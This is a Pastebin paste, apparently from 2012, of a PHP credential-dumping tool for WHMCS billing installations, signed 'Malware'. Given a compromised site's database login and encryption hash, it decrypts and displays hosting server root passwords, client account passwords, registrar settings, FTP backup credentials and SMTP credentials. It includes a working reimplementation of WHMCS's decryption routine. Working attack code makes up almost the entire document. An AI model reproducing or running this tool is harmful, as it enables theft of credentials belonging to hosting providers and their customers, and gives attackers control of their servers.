API tools faq
paste
Advertisement
malwareconf

WHMCS

malwareconf
Oct 21st, 2012
370
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.38 KB | None | 0 0
raw download clone embed print report
  1. <?
  2.  
  3. /*
  4.  
  5. * whmcs Mangement
  6.  
  7. * First codes by rab3oun Recoded By Malware 2012
  8.  
  9. * Add clients roots & client account
  10.  
  11. */
  12.  
  13.  
  14.  
  15. ob_start();
  16.  
  17. $login = ($_COOKIE['login'] == "ok") ? true:false;
  18.  
  19. ?>
  20.  
  21. <html>
  22.  
  23. <head>
  24.  
  25. <title>403 Malware</title>
  26.  
  27. <style>
  28.  
  29. *{
  30.  
  31. font-family: tahoma;
  32.  
  33. font-size: 12px;
  34.  
  35. }
  36.  
  37. #index{
  38.  
  39. margin: 0 150;
  40.  
  41. }
  42.  
  43. #header{
  44.  
  45. padding: 50px;
  46.  
  47. border:1px solid #000;
  48.  
  49. }
  50.  
  51. #navbar{
  52.  
  53. border-left:1px solid #000;
  54.  
  55. border-right:1px solid #000;
  56.  
  57. border-bottom:1px solid #000;
  58.  
  59. background:#000;
  60.  
  61. }
  62.  
  63. #navbar ul{
  64.  
  65.  
  66.  
  67. list-style-type: none;
  68.  
  69. margin:0;
  70.  
  71. padding: 0;
  72.  
  73. overflow: hidden;
  74.  
  75. }
  76.  
  77. #navbar ul li{
  78.  
  79. float:left;
  80.  
  81. }
  82.  
  83. #navbar ul li a{
  84.  
  85. display: block ;
  86.  
  87. text-decoration: none;
  88.  
  89. padding: 10px;
  90.  
  91. color:#fff;
  92.  
  93. }
  94.  
  95. #navbar ul li a:hover{
  96.  
  97. background: #fff;
  98.  
  99. color: #000;
  100.  
  101. }
  102.  
  103.  
  104.  
  105. #content{
  106.  
  107. padding: 10px;
  108.  
  109. border-left:1px solid #000;
  110.  
  111. border-right:1px solid #000;
  112.  
  113. text-align: center;
  114.  
  115. }
  116.  
  117. #footer{
  118.  
  119. text-align: center;
  120.  
  121. padding: 4px;
  122.  
  123. border:1px solid #000;
  124.  
  125. }
  126.  
  127.  
  128.  
  129. </style>
  130.  
  131. </head>
  132.  
  133. <body>
  134.  
  135. <div id="index">
  136.  
  137. <div id="header"><a href="?">whmcs Mangement</a></div>
  138.  
  139. <div id="navbar">
  140.  
  141. <ul>
  142.  
  143. <li><a href="?">Home</a></li>
  144.  
  145. <li><a href="?dp">Decode Pass</a></li>
  146.  
  147. <?
  148.  
  149. if($login){
  150.  
  151. echo '
  152.  
  153. <li><a href="?hostr00ts">Host r00ts</a></li>
  154.  
  155. <li><a href="?Clientsr00ts">Clients r00ts</a></li>
  156.  
  157. <li><a href="?Clientsinfos">Clients infos</a></li>
  158.  
  159. <li><a href="?domains">Domains</a></li>
  160.  
  161. <li><a href="?backup">Backup Infos</a></li>
  162.  
  163. <li><a href="?smtp">SMTP Infos</a></li>
  164.  
  165. <li><a href="?logout">Logout</a></li>
  166.  
  167. ';
  168.  
  169. }
  170.  
  171.  
  172.  
  173. ?>
  174.  
  175.  
  176.  
  177. </ul>
  178.  
  179. </div>
  180.  
  181.  
  182.  
  183. <div id="content">
  184.  
  185.  
  186.  
  187.  
  188.  
  189. <?
  190.  
  191.  
  192.  
  193. if(isset($_GET['dp'])){
  194.  
  195.  
  196.  
  197. if($_POST[pass] & $_POST[hash]){
  198.  
  199. echo "Decode Pass : <b>".decrypt($_POST[pass], $_POST[hash])."</b>";
  200.  
  201. }
  202.  
  203. echo "<form action='' method='POST'>
  204.  
  205. <table border='0' cellpadding='5' align='center'>
  206.  
  207. <tr><td>Pass</td><td><input type='text' name='pass' value='{$_POST[pass]}'/></td></tr>
  208.  
  209. <tr><td>CC Encryption Hash</td><td><input type='text' name='hash' value='{$_POST[hash]}'/></td></tr>
  210.  
  211. <tr><td colspan='2' align='center'><input type='submit' value='Decode'/></td></tr>
  212.  
  213. </table>
  214.  
  215. </form>";
  216.  
  217.  
  218.  
  219. }
  220.  
  221.  
  222.  
  223. if($_POST['ok'] == "Connect"){
  224.  
  225.  
  226.  
  227. if(!$_POST['host'] or !$_POST['user'] or !$_POST['pass'] or !$_POST['db'] or !$_POST['hash']){
  228.  
  229. echo "Error : Please Fill All inputs !";
  230.  
  231. }else{
  232.  
  233.  
  234.  
  235. if(@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']) && mysql_select_db($_POST['db'])){
  236.  
  237. echo "Done : Connection Successfully
  238.  
  239. <meta http-equiv='refresh' content='1;URL=?hostr00ts' />
  240.  
  241. ";
  242.  
  243. setcookie("host",$_POST['host']);
  244.  
  245. setcookie("user",$_POST['user']);
  246.  
  247. setcookie("pass",$_POST['pass']);
  248.  
  249. setcookie("db",$_POST['db']);
  250.  
  251. setcookie("hash",$_POST['hash']);
  252.  
  253. setcookie("login","ok");
  254.  
  255. ob_end_flush();
  256.  
  257. }else{
  258.  
  259. echo "Error : Check MySQL infos";
  260.  
  261. }
  262.  
  263.  
  264.  
  265. }
  266.  
  267. }
  268.  
  269.  
  270.  
  271. if(!$login && !$_GET){
  272.  
  273. echo '<form action="" method="post">
  274.  
  275. <table border="0" cellpadding="5" align="center">
  276.  
  277. <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_POST[host].'"></td></tr>
  278.  
  279. <tr><td>user</td><td>: <input type="text" name="user" value="'.$_POST[user].'"></td></tr>
  280.  
  281. <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_POST[pass].'"></td></tr>
  282.  
  283. <tr><td>db</td><td>: <input type="text" name="db" value="'.$_POST[db].'"></td></tr>
  284.  
  285. <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_POST[hash].'"></td></tr>
  286.  
  287. <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
  288.  
  289. </table>
  290.  
  291. </form>';
  292.  
  293. }elseif($login){
  294.  
  295.  
  296.  
  297. mysql_connect($_COOKIE['host'] , $_COOKIE['user'] , $_COOKIE['pass']);
  298.  
  299. mysql_select_db($_COOKIE['db']);
  300.  
  301. $cc_encryption_hash = $_COOKIE['hash'];
  302.  
  303.  
  304.  
  305. if(!$_GET){
  306.  
  307. echo '<form action="" method="post">
  308.  
  309. <table border="0" cellpadding="5" align="center">
  310.  
  311. <tr><td>Host</td><td>: <input type="text" name="host" value="'.$_COOKIE[host].'"></td></tr>
  312.  
  313. <tr><td>user</td><td>: <input type="text" name="user" value="'.$_COOKIE[user].'"></td></tr>
  314.  
  315. <tr><td>pass</td><td>: <input type="text" name="pass" value="'.$_COOKIE[pass].'"></td></tr>
  316.  
  317. <tr><td>db</td><td>: <input type="text" name="db" value="'.$_COOKIE[db].'"></td></tr>
  318.  
  319. <tr><td>hash</td><td>: <input type="text" name="hash" value="'.$_COOKIE[hash].'"></td></tr>
  320.  
  321. <tr><td colspan="2" align="center"><input type="submit" value="Connect" name="ok"></td></tr>
  322.  
  323. </table>
  324.  
  325. </form>';
  326.  
  327. }elseif(isset($_GET['domains'])){
  328.  
  329.  
  330.  
  331. $query = mysql_query("SELECT * FROM tblregistrars");
  332.  
  333.  
  334.  
  335. echo "<table border='1' align='center' cellpadding='5'>
  336.  
  337. <tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>";
  338.  
  339.  
  340.  
  341. while($v = mysql_fetch_array($query)) {
  342.  
  343. $value = (!decrypt($v['value'], $cc_encryption_hash)) ? "0":decrypt($v['value'], $cc_encryption_hash);
  344.  
  345. echo "<tr><td>{$v['registrar']}</td><td>{$v['setting']}</td><td>$value</td></tr>" ;
  346.  
  347. }
  348.  
  349.  
  350.  
  351. echo "</table>";
  352.  
  353.  
  354.  
  355. }elseif(isset($_GET['Clientsinfos'])){
  356.  
  357.  
  358.  
  359. $query = mysql_query("SELECT * FROM tblhosting");
  360.  
  361. echo "<table border='1' cellpadding='5' align='center'>
  362.  
  363. <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
  364.  
  365. while($v = mysql_fetch_array($query)) {
  366.  
  367. echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v
  368.  
  369. ['assignedips']}</td></tr>";
  370.  
  371. }
  372.  
  373. echo "</table>";
  374.  
  375.  
  376.  
  377. }elseif(isset($_GET['Clientsr00ts'])){
  378.  
  379.  
  380.  
  381. $query = mysql_query("SELECT * FROM tblhosting where username = 'root'");
  382.  
  383. echo "<table border='1' cellpadding='5' align='center'>
  384.  
  385. <tr><td>domain</td><td>User</td><td>Pass</td><td>IP's</td></tr>";
  386.  
  387.  
  388.  
  389. if(!is_array(mysql_fetch_array($query))){
  390.  
  391. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  392.  
  393. }
  394.  
  395. while($v = mysql_fetch_array($query)) {
  396.  
  397. echo "<tr><td>{$v['domain']}</td><td>{$v['username']}</td><td>".decrypt ($v['password'], $cc_encryption_hash)."</td><td>{$v
  398.  
  399. ['assignedips']}</td></tr>";
  400.  
  401. }
  402.  
  403. echo "</table>";
  404.  
  405.  
  406.  
  407. }elseif(isset($_GET['hostr00ts'])){
  408.  
  409. $query = mysql_query("SELECT * FROM tblservers");
  410.  
  411.  
  412.  
  413. echo "<table border='1' cellpadding='5' align='center'>
  414.  
  415. <tr><td>Type</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
  416.  
  417.  
  418.  
  419. while($v = mysql_fetch_array($query)) {
  420.  
  421.  
  422.  
  423. echo "<tr>
  424.  
  425. <td>{$v['type']}</td><td>{$v['active']}</td><td>{$v['ipaddress']}</td><td>{$v['username']}</td><td>".decrypt($v['password'],
  426.  
  427. $cc_encryption_hash)."</td>
  428.  
  429. </tr>";
  430.  
  431. }
  432.  
  433. echo "</table>";
  434.  
  435. }elseif(isset($_GET['backup'])){
  436.  
  437.  
  438.  
  439. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  440.  
  441.  
  442.  
  443. echo "<table border='1' cellpadding='5' align='center'>";
  444.  
  445.  
  446.  
  447. $wht = array('FTPBackupHostname','FTPBackupUsername','FTPBackupPassword','FTPBackupDestination');
  448.  
  449.  
  450.  
  451. while($row = mysql_fetch_array($query)){
  452.  
  453.  
  454.  
  455. if($row[setting] == $wht[0]){
  456.  
  457. echo "<tr><td>Hostname</td><td>{$row[value]}</td></tr>"; $wht[0] = xxx;
  458.  
  459. }elseif($row[setting] == $wht[1]){
  460.  
  461. echo "<tr><td>Username</td><td>{$row[value]}</td></tr>"; $wht[1] = xxx;
  462.  
  463. }elseif($row[setting] == $wht[2]){
  464.  
  465. echo "<tr><td>Password</td><td>{$row[value]}</td></tr>"; $wht[2] = xxx;
  466.  
  467. }elseif($row[setting] == $wht[3]){
  468.  
  469. echo "<tr><td>Destination</td><td>{$row[value]}</td></tr>"; $wht[3] = xxx;
  470.  
  471. }
  472.  
  473. }
  474.  
  475.  
  476.  
  477. echo "</table>";
  478.  
  479.  
  480.  
  481. }elseif(isset($_GET['smtp'])){
  482.  
  483.  
  484.  
  485. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  486.  
  487.  
  488.  
  489. echo "<table border='1' cellpadding='5' align='center'>";
  490.  
  491.  
  492.  
  493. while($row = mysql_fetch_array($query)){
  494.  
  495.  
  496.  
  497. if($row[setting] == 'SMTPHost'){
  498.  
  499. echo "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";
  500.  
  501. }elseif($row[setting] == 'SMTPUsername'){
  502.  
  503. echo "<tr><td>Username</td><td>{$row[value]}</td></tr>";
  504.  
  505. }elseif($row[setting] == 'SMTPPassword'){
  506.  
  507. echo "<tr><td>Password</td><td>{$row[value]}</td></tr>";
  508.  
  509. }elseif($row[setting] == 'SMTPPort'){
  510.  
  511. echo "<tr><td>Port</td><td>{$row[value]}</td></tr>";
  512.  
  513. }
  514.  
  515. }
  516.  
  517.  
  518.  
  519. echo "</table>";
  520.  
  521.  
  522.  
  523. }elseif(isset($_GET['logout'])){
  524.  
  525. foreach($_COOKIE as $name=>$value){ setcookie($name,0); }
  526.  
  527. echo "Thanks For Using Me xD <meta http-equiv='refresh' content='1;URL=?' />";
  528.  
  529.  
  530.  
  531. }
  532.  
  533.  
  534.  
  535. }
  536.  
  537.  
  538.  
  539. ?>
  540.  
  541. </div>
  542.  
  543.  
  544.  
  545. <div id="footer">First Codes by Rab3oun Moded By Lagripe-Dz &copy 2011 Recoded Malware 2012</div>
  546.  
  547. </div>
  548.  
  549. </body>
  550.  
  551. </html>
  552.  
  553. <?
  554.  
  555. function decrypt ($string,$cc_encryption_hash)
  556.  
  557. {
  558.  
  559. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  560.  
  561. $hash_key = _hash ($key);
  562.  
  563. $hash_length = strlen ($hash_key);
  564.  
  565. $string = base64_decode ($string);
  566.  
  567. $tmp_iv = substr ($string, 0, $hash_length);
  568.  
  569. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  570.  
  571. $iv = $out = '';
  572.  
  573. $c = 0;
  574.  
  575. while ($c < $hash_length)
  576.  
  577. {
  578.  
  579. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  580.  
  581. ++$c;
  582.  
  583. }
  584.  
  585.  
  586.  
  587. $key = $iv;
  588.  
  589. $c = 0;
  590.  
  591. while ($c < strlen ($string))
  592.  
  593. {
  594.  
  595. if (($c != 0 AND $c % $hash_length == 0))
  596.  
  597. {
  598.  
  599. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  600.  
  601. }
  602.  
  603.  
  604.  
  605. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  606.  
  607. ++$c;
  608.  
  609. }
  610.  
  611.  
  612.  
  613. return $out;
  614.  
  615. }
  616.  
  617.  
  618.  
  619.  
  620.  
  621. function _hash ($string)
  622.  
  623. {
  624.  
  625. $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
  626.  
  627. $out = '';
  628.  
  629. $c = 0;
  630.  
  631. while ($c < strlen ($hash))
  632.  
  633. {
  634.  
  635. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  636.  
  637. $c += 2;
  638.  
  639. }
  640.  
  641. return $out;
  642.  
  643. }
  644.  
  645. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!